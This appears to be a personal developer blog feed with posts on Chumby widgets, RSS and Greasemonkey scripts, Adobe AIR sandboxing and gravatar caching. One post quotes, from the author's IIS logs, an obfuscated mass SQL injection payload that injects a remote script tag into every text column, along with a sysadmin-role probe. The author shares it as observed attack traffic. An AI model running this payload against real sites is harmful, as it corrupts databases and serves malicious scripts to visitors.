For several weekends over the last month I have been working on an iTunes remote for the Chumby platform. Today, it went from private beta to public release.

If you have iTunes, and a Chumby and desire to control iTunes from it, you should check out the widget.

It does require a small piece of software to run on the machine which has iTunes installed. I provide a free chumbiTunes server software for Windows, however a Mac version will need to be purchased for now.





Created 154 weeks, 1 day ago

Here is another example of a SQL injection attack found while digging through my IIS logs.

These were appended to the end of the URI as HTTP GET. How long before we see these attacks as POST or inside the URI, not appended to the end?

---

dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=['+@c+']+cAsT(0x223E3C2F7469746C653E3C736372697074207
372633D687474703A2F2F253733253631253739253338253245253735253
7332F732E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67))') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR;

202.165.185.210
HTTP/1.1 Mozilla/4.0

This request is always followed by another GET request with this SQL injection attack:

And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1

202.165.185.210
HTTP/1.1 Mozilla/4.0

---

This has all been brought to light because I have had to retrofit some of my older sites due to thier vulnerability to some of the mass SQL injection attacks lately.


technorati: SQL Injection

Created 207 weeks, 3 days ago

I just finished working on a video repository site. I will post more on it later, but if you want to see it in action, checkout http://video.viewmastr.com/.

The repository supports per-user disk quotas and will soon support a flash file uploader. I will release some of the source code soon as well.



Created 222 weeks, 7 hours ago

This is basically an Applescript that will create a duplicate (but usable) .m3u file from one you drop on it. This duplicate has a new file format that iTunes 7.6 can actually use.

Note: The new file will have a new extension appended to the file name of ".fixed.m3u".

This is only a fix for Mac OSX. I am starting to see error reports on this behavior so it is just a temporary fix until the damn thing iTunes is updated again.

Update 2/27/08 - iTunes 7.6.1 for OSX seems to have included a fix for the problem. I don't think you need to use this script any longer. I am leaving it up for archival purposes.




technorati: m3u, applescript, osx, parse, iTunes



Created 224 weeks, 6 days ago

I needed to access an instance of a local webserver to make some requests from a local webservice from within an AIR application. Since AIR uses an application sandbox security model to protect the user from malicious code being run, I had to setup an iFrame based sandbox document to work with this security.

The problem I was getting the sandboxRoot and documentRoot attributes working together to instruct the AIR application to look at a local web server instead of at its own application directory.

It turns out that the sandboxRoot attribute can access local files from the AIR package using the handles "http://localhost/" and "http://air/". As long as the documentRoot attribute is set to "app-resource:/" this instructs the AIR runtime to look at the filesystem for the src attribute. If you actually want to access a local server from within AIR you need to set documentRoot to "app:/" and sandboxRoot to "http://localhost/".


Here are some samples:

This example will instruct AIR to search for "index.html" in the root of the application filesystem:

<iframe id="UI" src="index.html" sandboxRoot="http://localhost/"
 documentRoot="app-resource:/" width="100%" height="100%"></iframe>

   
This example will instruct AIR to  search for "index.html" at port 80 of the http server running locally:

<iframe id="UI" src="index.html" sandboxRoot="http://localhost/"
 documentRoot="app:/" width="100%" height="100%"></iframe>

technorati: Adobe, AIR, example, sandboxRoot

Created 226 weeks, 8 hours ago

When an application relies on data from third parties, one of the biggest risks you take when developing these applications is the data you are relying on will change. The biggest worry is that it will change without any notification. Depending on the success and usage of your application, you usually only find out only once things break catastrophically.

An inbox full of "HELP!" themed e-mail from your users is usually how it starts. The next few hours are usually spent fixing the data connections and remapping values.

However sometimes things go really wrong. Maybe the data models change drastically; or even worse, the data owner decides to implement access control. Usually what you do at this point as a developer is to replace your normal application output with some sort of message to your users explaining the problem.

"Sorry, but we are down for maintenance", or "XYZ just changed their data. Working to fix the problem!" are usually good ones. And then sometimes you use messages like this:


I feel your pain brotha. Well not the donkey-punch pain, but I hear ya.




Created 230 weeks, 11 hours ago

If you use NextBus.com you will be happy to know I wrote a NextBus.com connector widget for the Chumby. I marked it as public on Saturday the 17th, but it turns out there is about a one month wait for widgets to go public, so don't expect to see it soon.

The widget is running below. Also, I think it has one of the coolest config screens for a widget created yet (thank you very much).



Thanks to NextBus for creating best public transportation tracking system. I rely on this information daily!

Enjoy folks.

technorati: NextBus, widget, Chumby

Created 234 weeks, 2 days ago

I was informed by several users that the Netflix RSS format had changed; which means that my Netflix widget was out of sync. I updated the code and it is back up and running. For some reason no one from Netflix bothered to tell me they were making the change .

I also noticed that they are hosting the images on several different servers, yet they don't provide that info in the RSS feed. This is the reason why some of the movies have images with the message: "Image not available". I will try to enhance the widget to sniff out the correct image server in a future update.

technorati: netflix, widget, RSS, web, page

Created 258 weeks, 6 days ago

Check out my new PageInfo script (on my web site). I decided to release this preview personal build this morning as I didn't get to go to Web 2.0 Expo this week thereby giving me some extra time to actually work on some fun stuff.

This script is the culmination of the latest version of my RSSPreview script with some new ideas I have for supporting microformats, microsummaries and more.


I will have a public build soon in all kinds of flavors. If you have feedback, send it my way. Thanks!


technorati: PageInfo, RSS, Microformats, Microsummaries

Created 264 weeks, 6 days ago

Since I am using a set of custom tools to track my diet, I thought others might benefit from using them. I present to you my CalorieKing.com Weight Watchers POINTS calculator that generates Weight Watchers POINTS values for all the food in the CalorieKing.com database.

This script will show you the points value directly under the portion widget on the CalorieKing food details page. I have it showing the calories, fat and fiber in a table so I can copy it to my diet tracking spreadsheet pre-formatted. You will need to install Greasemonkey and of course have the Firefox web browser to get this script working. Let me know if you have any feedback. Enjoy!

technorati: Weight Watchers, points, gGreasemonkey, user script, diet, tool

Created 267 weeks, 4 days ago

Today, I updated the RSS Preview script that powers the RSS Preview FireFox add-on and RSS Preview bookmarklet.

Two fixes that several folks had been wanting:

1. Fixed the font to something easier to read.
   
   
2. Updated the logic to parse the RSS path better. Now relative paths should be converted to absolute paths in all cases [example: Woot!]. The only reason this shouldn't work is if the endpoint RSS is 404 or 500.
   

The fix is already in place for anyone who is already using the script. If you want to install the script, take a look at my introduction post for the RSS Preview FireFox Add-on.

technorati: FireFox, rss, add-on, greasemonkey, userscript


Created 271 weeks, 4 days ago

Chinese Simplified example:

http://www.dotssier.com/demo/dossier_cn/



This is an update on my new script in development:  Dotssier.




Created 271 weeks, 5 days ago

I performed more testing tonight on the RSS Preview script using my modular overlay system and I found very few additional bugs (CSS issues aside).

I mentioned in an earlier post that i wanted to wrap it up as an Add-on for FireFox. Well here it is: an RSS Preview script add-on for FireFox (beta).

First it was authored as a greasemonkey script and then I used this User Script Compiler to create the Add-on. That means there is also a greasemonkey script for RSS Preview if you use greasemonkey. If you don't want to install it to your browser, the RSS Preview tool is also available as a bookmarklet.

technorati: firefox, rss, add-on, greasemonkey, userscript

Created 274 weeks, 20 hours ago

Today I am releasing the first public beta test of a generic overlay framework I have been working on. The framework is designed to have 'pluggable' functionality for any type of script you can dream up to include inside of it.

I have hooked it up with a small tool that checks a Web page for RSS links and provides you with more options for each RSS link than web browsers do. When it finds an RSS link it gives you the ability to subscribe to the feeds with several RSS readers or social bookmark sites. It also gives you the ability to preview the feeds with a small embedded grazr window without having to subscribe to the feed.

To beta test the script visit the RSS preview beta install page and follow the directions to hook it up in your browser. Please submit your feedback to my contact form or as comments at this post.

If you would to just  test how the bookmarklet works (using this page as an example), try clicking this link while in your web browser.



If I can get most of the known bugs worked out (and I don't find many new bugs) I will release the framework overlay script soon. I also need to tidy up the code and make it more oo  (Lee, want to help?).

I have a few more ideas for plugins I will build into my own toolset. I also think I can create have created a FireFox Add-on that runs the script from a button. The RSS link subscription button is also a separate project I will be releasing soon.




Thanks for testing. Remember, please submit your feedback to my contact form or at this post.


technorati: bookmarklet, rss, browser

Created 274 weeks, 1 day ago

If you are looking for a solution to cache gravatar images for your blog, forum, newsletter, BBS this gravatar caching script might be just what you are looking for.

I present to you the first public release of the gravatar caching script for asp.net. This script offers you the ability to have your application cache gravatar icons on your own server to improve the user experience of your application when the gravatar servers get bogged down or go offline.

It is super simple to setup and use. Just download the script, plop it into a folder with asp.net 2.0 support, configure your asp.net permissions on the caching folder and start sending all of your gravatar URL traffic to the new URL. Every bit of the script is configurable with a few simple variables to modify. You don't even have to change the query string variables you are sending now.

Of course, this wouldn't be possible without the wonderful gravatar.com global avatar site. If you don't use it, you should. There are already some minor mods I have in store for the next version update (security - keep people from using your caching script, local icons - include your own icons for faster service, and more).



technorati: gravatar, asp.net, cache

Created 286 weeks, 6 days ago

Ever have Google Toolbar spellcheck barf and ruin your markup with its DHTML <span> tags around all the misspelled and questionable words?

Below is a Dreamweaver Find and Replace query file that you can download and load into the Find and Replace window to remove all the undesirable markup if you paste the ruined code into a new Dreamweaver document and run this query on it.




Instructions:

1. Download and extract the dwr file to your computer.
   
   
2. Make sure "Use regular expression" is checked in the Find and Replace window.
   
   
3. Click on the "Load Query" button (it looks like a folder) and select the file you downloaded.
   
   
4. Find and replace the text as usual.
   
   
5. Continue until all of your content is clean.

technorati: Google, Toolbar, Spellcheck, Dreamweaver, Query, Find and Replace


Created 291 weeks, 1 day ago